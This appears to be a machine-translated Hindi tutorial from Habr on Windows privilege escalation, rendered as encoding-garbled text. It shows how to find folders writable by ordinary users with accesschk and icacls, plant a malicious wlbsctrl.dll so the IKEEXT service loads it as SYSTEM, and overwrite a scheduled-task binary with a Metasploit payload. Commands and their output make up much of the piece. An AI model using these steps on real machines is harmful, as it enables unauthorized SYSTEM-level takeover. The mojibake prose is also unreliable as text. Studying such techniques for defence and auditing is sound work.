рдЪреВрдВрдХрд┐ dll рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рдЗрд╕рд▓рд┐рдП рд╣рдо рд╕рднреА рдЦреЛрдЬ рд░рд╛рд╕реНрддреЛрдВ рд╕реЗ рдЧреБрдЬрд░ рд░рд╣реЗ рд╣реИрдВред рдирд┐рдореНрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╕реНрддрд░ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ 1-4, 5. рдЖрдЗрдЯрдореЛрдВ рдореЗрдВ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рд▓рдЧрд╛рдиреЗ рдХреА рдмрд╣реБрдд рдХрдо рд╕рдВрднрд╛рд╡рдирд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдЧрд░ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХрд┐рд╕реА рднреА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рддрдХ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ рд╣рдорд╛рд░реЗ рдЬреАрддрдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рдмрд╣реБрдд рдЕрдЪреНрдЫреА рд╣реИред

рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рдпрд╣ рд╡реНрдпрд╡рд╣рд╛рд░ рдореЗрдВ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, рд╣рдорд╛рд░реЗ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП рд╣рдо IKEEXT (IPSec IKE рдФрд░ AuthIP рдХреБрдВрдЬреА рдореЙрдбреНрдпреВрд▓) рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗ рдЬреЛ wlbsctrl.dll рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рддреА рд╣реИред

"C: \" рдореЗрдВ рдХреЛрдИ рднреА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рд▓рд┐рдЦрд┐рдд рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХрд░реЗрдЧреА, рдЗрд╕рд╕реЗ рд╣рдореЗрдВ рдПрдХ рдореМрдХрд╛ рдорд┐рд▓рддрд╛ рд╣реИред

 C:\Users\user1\Desktop> accesschk.exe -dqv "C:\Python27" 

 C:\Python27 Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Administrators FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS R BUILTIN\Users FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL RW NT AUTHORITY\Authenticated Users FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE FILE_WRITE_ATTRIBUTES FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL 

 C:\Users\user1\Desktop> icacls "C:\Python27" 

 C:\Python27 BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

рдПрдл - рдкреВрд░реНрдг рдкрд╣реБрдВрдЪред
(OI) - рд╡рд╕реНрддреБрдУрдВ рджреНрд╡рд╛рд░рд╛ рд╡рд┐рд░рд╛рд╕рддред
(CI) - рдХрдВрдЯреЗрдирд░реЛрдВ рджреНрд╡рд╛рд░рд╛ рд╡рд┐рд░рд╛рд╕рддред
(IO) - рдХреЗрд╡рд▓ рд╡рдВрд╢рд╛рдиреБрдХреНрд░рдоред
(рдПрдирдкреА) - рд╡рдВрд╢рд╛рдиреБрдХреНрд░рдо рдХреЗ рд╡рд┐рддрд░рдг рдкрд░ рдкреНрд░рддрд┐рдмрдВрдзред
(I) - рдореВрд▓ рдХрдВрдЯреЗрдирд░ рд╕реЗ рдЕрдиреБрдорддрд┐ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ред

рдХрд╛рд░реНрд░рд╡рд╛рдИ рд╕реЗ рдЖрдЧреЗ рдмрдврд╝рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ, рдЖрдкрдХреЛ IKEEXT рд╕реЗрд╡рд╛ рдХреА рд╕реНрдерд┐рддрд┐ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреА рдЪрд╛рд╣рд┐рдПред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рдо рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдпрд╣ "AUTO_START" рдкрд░ рд╕реЗрдЯ рд╣реИ!

 sc qc IKEEXT 

 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IKEEXT TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IKE and AuthIP IPsec Keying Modules DEPENDENCIES : BFE SERVICE_START_NAME : LocalSystem

рдЕрдм рд╣рдо рдЬрд╛рдирддреЗ рд╣реИрдВ рдХрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЖрд╡рд╢реНрдпрдХ рд╢рд░реНрддреЗрдВ рд╣реИрдВ, рдФрд░ рд╣рдо рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рдмрдирд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЦреЛрд▓ рдХреЛ рд░реЛрдХ рд╕рдХрддреЗ рд╣реИрдВ!

рд╣рдо рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, Metasploit -> msfvenom рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред



рд╣рдорд╛рд░реЗ рдЯрд╛рд░рдЧреЗрдЯ рдХрдВрдкреНрдпреВрдЯрд░ рдореЗрдВ bad.dll рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рдХреЗрд╡рд▓ рдЗрддрдирд╛ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рдЗрд╕реЗ wlbsctrl.dll рдореЗрдВ рдмрджрд▓ рджрд┐рдпрд╛ рдЬрд╛рдП рдФрд░ рдЗрд╕реЗ "C: \ Python27" рдкрд░ рд▓реЗ рдЬрд╛рдпрд╛ рдЬрд╛рдПред рдПрдХ рдмрд╛рд░ рдпрд╣ рд╣реЛ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рдорд╢реАрди рдХреЛ рдлрд┐рд░ рд╕реЗ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдзреИрд░реНрдпрдкреВрд░реНрд╡рдХ рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ (рдпрд╛ рд╣рдо рд░рд┐рдмреВрдЯ рдХреЛ рдмрд╛рдзреНрдп рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ), рдФрд░ рд╣рдореЗрдВ рд╕рд┐рд╕реНрдЯрдо рд╢реЗрд▓ рдорд┐рд▓реЗрдЧрд╛ред

 copy evil.dll C:\Python27\wlbsctrl.dll

рдЙрд╕рдХреЗ рдмрд╛рдж, рдпрд╣ рдХреЗрд╡рд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рд░рд┐рдмреВрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрдВрддрдЬрд╛рд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд░рд╣рддрд╛ рд╣реИред

рд╣рдорд╛рд░реЗ рдЕрдВрддрд┐рдо рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣рдо рдирд┐рдпреЛрдЬрд┐рдд рдХрд╛рд░реНрдпреЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВрдЧреЗред рдореИрдВ рд╕рд┐рджреНрдзрд╛рдВрдд рдХрд╛ рд╡рд░реНрдгрди рдХрд░реВрдВрдЧрд╛, рдХреНрдпреЛрдВрдХрд┐ рд╕рднреА рдХреЗ рдЕрд▓рдЧ-рдЕрд▓рдЧ рдорд╛рдорд▓реЗ рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред

рд╣рдо рд╕рд┐рд╕реНрдЯрдо рд╕реЗ рдХрд╛рд░реНрдп рдЕрдиреБрд╕реВрдЪрдХ рджреНрд╡рд╛рд░рд╛ рд╢реБрд░реВ рдХреА рдЧрдИ рдкреНрд░рдХреНрд░рд┐рдпрд╛, рд╕реЗрд╡рд╛, рдЖрд╡реЗрджрди рдкрд╛рддреЗ рд╣реИрдВред
рд╣рдо рдЙрд╕ рдлрд╝реЛрд▓реНрдбрд░ рдХреЗ рдПрдХреНрд╕реЗрд╕ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░рддреЗ рд╣реИрдВ рдЬрд╣рд╛рдВ рд╣рдорд╛рд░рд╛ рд▓рдХреНрд╖реНрдп рд╕реНрдерд┐рдд рд╣реИред

 accesschk.exe -dqv "__"

рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реИ рдХрд┐ рдпрд╣ рдПрдХ рдЧрдВрднреАрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рд╕рдорд╕реНрдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕рд╕реЗ рднреА рдмрджрддрд░ рддрдереНрдп рдпрд╣ рд╣реИ рдХрд┐ рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (рдкреНрд░рд╛рдорд╛рдгрд┐рдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛) рдиреЗ рдЗрд╕ рдлрд╝реЛрд▓реНрдбрд░ рддрдХ рдкрд╣реБрдВрдЪ рд▓рд┐рдЦреА рд╣реИред рдЗрд╕ рдЙрджрд╛рд╣рд░рдг рдореЗрдВ, рд╣рдо рдмрд╕ рдореЗрдЯрд╛рдмреЗрд╕рд▓реЙрдЗрдЯ рджреНрд╡рд╛рд░рд╛ рдЙрддреНрдкрдиреНрди рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕рд╛рде рджреНрд╡рд┐рдЖрдзрд╛рд░реА рдирд┐рд╖реНрдкрд╛рджрди рдХреЛ рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ рдПрдиреНрдХреЛрдб рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред



рдЕрдм рд╡рд╣ рд╕рдм рдХреБрдЫ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдХреЛ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдФрд░ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдЗрд╕реЗ рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реИред рдПрдХ рдмрд╛рд░ рдпрд╣ рдкреВрд░рд╛ рд╣реЛ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рд╕реБрд░рдХреНрд╖рд┐рдд рд░реВрдк рд╕реЗ рдмрд┐рд╕реНрддрд░ рдкрд░ рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╕реБрдмрд╣ рдЬрд▓реНрджреА рдЙрда рд╕рдХрддреЗ рд╣реИрдВред

рдЗрди рджреЛ рдЙрджрд╛рд╣рд░рдгреЛрдВ рд╕реЗ рд╣рдореЗрдВ рдЙрди рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдЕрдВрджрд╛рдЬрд╛ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдЬреЛ рдлрд╛рдЗрд▓реЛрдВ рдФрд░ рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдХреЗ рд▓рд┐рдП рдЕрдиреБрдорддрд┐рдпреЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░рддреЗ рд╕рдордп рджреЗрдЦреА рдЬрд╛рдиреА рдЪрд╛рд╣рд┐рдПред рд╡рд┐рдВрдбреЛрдЬрд╝ рд╕реЗрд╡рд╛рдУрдВ, рдЕрдиреБрд╕реВрдЪрд┐рдд рдХрд╛рд░реНрдпреЛрдВ рдФрд░ рдСрдЯреЛрд░рди рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рд╕рднреА рджреНрд╡рд┐рдкрде рдкрде рд╕реАрдЦрдиреЗ рдореЗрдВ рд╕рдордп рд▓рдЧреЗрдЧрд╛ред

рдЕрдВрдд рдореЗрдВ, accesschk.exe рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдЫ рд╕реБрдЭрд╛рд╡ред

рдбрд┐рд╕реНрдХ рдкрд░ рдлрд╝реЛрд▓реНрдбрд░реНрд╕ рдХреЗ рд▓рд┐рдП рд╕рднреА рдХрдордЬреЛрд░ рдЕрдиреБрдорддрд┐рдпрд╛рдБ рдЦреЛрдЬреЗрдВред

 accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\

рдбрд┐рд╕реНрдХ рдкрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП рд╕рднреА рдХрдордЬреЛрд░ рдЕрдиреБрдорддрд┐рдпрд╛рдВ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

 accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.*

рд╕рдм рдХреБрдЫ рдкрд╕рдВрдж рд╣реИред

Source: https://habr.com/ru/post/hi418441/

More articles:


All Articles